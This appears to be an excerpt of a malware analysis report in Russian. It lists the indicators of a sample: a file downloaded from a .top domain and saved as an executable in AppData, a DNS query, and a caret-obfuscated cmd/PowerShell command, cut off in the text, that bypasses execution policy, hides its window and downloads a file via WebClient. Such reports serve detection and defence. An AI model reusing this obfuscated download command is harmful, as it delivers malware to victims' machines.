Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWe^RSHell.E^xE ^-ex^ECu^tIOnpOlIcY^ byPaS^S -^n^op^rOF^iL^E -Wi^ndo^w^STylE ^HID^DeN ^(^New^-O^BJe^c^T^ ^S^YSTEm.Ne^T.Web^cL^Ie^nt).^d^owNLOa^D^fI^lE('http://www.doorasope...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "p^oWe^RSHell.E^xE ^-ex^ECu^tIOnpOlIcY^ byPaS^S -^n^op^rOF^iL^E -Wi^ndo^w^STylE ^HID^DeN ^(^New^-O^BJe^c^T^ ^S^YSTEm.Ne^T.Web^cL^Ie^nt).^d^owNLOa^D^fI^lE('http://www.doorasope...' (со скрытым окном)